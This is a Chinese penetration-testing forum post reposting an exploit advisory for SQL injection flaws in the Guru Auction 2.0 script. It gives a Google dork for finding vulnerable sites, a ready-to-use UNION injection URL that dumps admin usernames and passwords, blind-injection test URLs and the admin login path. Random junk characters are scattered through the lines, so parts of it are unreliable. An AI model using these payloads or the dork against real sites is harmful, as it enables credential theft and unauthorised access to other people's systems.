找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Guru Auction 2.0多重sql注射
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2075|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
, I# G# m: F$ y$ S6 p, r
9 D! w* S9 |; t3 T8 `7 ~2 I作者     : v3n0m3 ^! U5 u9 R3 u
应用 : Guru Auction 2.0% l" p/ l0 A: A
Price       : $493 q5 X# |* Z6 W2 l% {
Vendor      : http://www.guruscript.com/+ }0 ?5 z. ?) ]7 x
Google Dork : inurl:subcat.php?cate_id=
& S4 Q& |* w; V/ r
/ \1 N9 H0 s% D0 W5 JSQLi p0c:0 S; L$ e. q' P+ T7 c
~~~~~~~~~~" i( k) W5 r- N# a# C
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--2 y0 L. p8 D+ E) P5 @& O8 G
. T) w: c/ B3 e. }: F
2 O; z% e: Z) J/ G+ ^8 c6 m
盲注 p0c:' e# a0 J7 Z: D  c, g2 h6 g
~~~~~~~~~~& c0 h2 V# `2 Z/ C6 v3 [- I
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true0 l& p5 g! n& x' T) @
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false4 J. }1 U( p$ X) G% `3 ?% `& y3 r

& R7 n3 A/ q  N5 C) T  i/ D管理登录入口:
4 {- `5 h: Y0 e# `~~~~~~~~~~0 X5 P% Q1 y) t) _9 Y  z
http://domain.tld/[path]/admin/
7 f4 p- r4 ?# o, l% L
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表